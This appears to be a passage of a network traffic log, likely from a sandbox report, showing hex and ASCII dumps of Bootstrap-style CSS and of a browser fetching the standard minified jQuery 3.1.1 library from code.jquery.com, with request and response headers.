2025-02-25 16:12:43 UTC	16384	IN	Data Raw: 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 38 20 38 27 25 33 45 25 33 43 70 61 74 68 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 20 64 3d 27 4d 36 2e 35 36 34 2e 37 35 6c 2d 33 2e 35 39 20 33 2e 36 31 32 2d 31 2e 35 33 38 2d 31 2e 35 35 4c 30 20 34 2e 32 36 20 32 2e 39 37 34 20 37 2e 32 35 20 38 20 32 2e 31 39 33 7a 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 75 73 74 6f 6d 2d 63 68 65 63 6b 62 6f 78 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 Data Ascii: ttp://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23fff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E") } .custom-checkbox .custom-control-input:indeterminate~.custom-control-label::before {
2025-02-25 16:12:43 UTC	16336	IN	Data Raw: 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 78 6c 20 2e 64 72 6f 70 75 70 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 31 30 30 25 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 20 68 6f 72 69 7a 6f 6e 74 61 6c 3b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 66 6c 6f Data Ascii: } .navbar-expand-xl .dropup .dropdown-menu { top: auto; bottom: 100% } } .navbar-expand { -webkit-box-orient: horizontal; -webkit-box-direction: normal; -ms-flex-flo
2025-02-25 16:12:43 UTC	48	IN	Data Raw: 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 Data Ascii: t-decoration: none; background-color: #
2025-02-25 16:12:43 UTC	16384	IN	Data Raw: 31 31 37 61 38 62 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 61 64 67 65 2d 77 61 72 6e 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 31 32 35 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 63 31 30 37 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 61 64 67 65 2d 77 61 72 6e 69 6e 67 5b 68 72 65 66 5d 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 61 64 67 65 2d 77 61 72 6e 69 6e 67 5b 68 72 65 66 5d 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 31 32 35 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: 117a8b } .badge-warning { color: #212529; background-color: #ffc107 } .badge-warning[href]:focus, .badge-warning[href]:hover { color: #212529; text-decoration: none; background-colo

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:45 UTC	498	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:45 UTC	614	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Tue, 25 Feb 2025 16:12:45 GMT Age: 1734195 X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740074-EWR X-Cache: HIT, HIT X-Cache-Hits: 4188, 16 X-Timer: S1740499965.287901,VS0,VE0 Vary: Accept-Encoding
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e Data Ascii: array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 Data Ascii: p("^"+K+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\\("+K+"((?:-\\d)?\\d)"+K+"\\)\|)(?=[^-]\|$)","i")},W=/^(?:input\|select\|textarea\|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)\|(\w+)\|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74 Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q\|\|!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2025-02-25 16:12:45 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Timestamp	Bytes transferred	Direction	Data
2025-02-25 16:12:45 UTC	358	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-25 16:12:46 UTC	614	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Tue, 25 Feb 2025 16:12:46 GMT Age: 1734196 X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740055-EWR X-Cache: HIT, HIT X-Cache-Hits: 4188, 30 X-Timer: S1740499966.030297,VS0,VE0 Vary: Accept-Encoding
2025-02-25 16:12:46 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-02-25 16:12:46 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2025-02-25 16:12:46 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2025-02-25 16:12:46 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
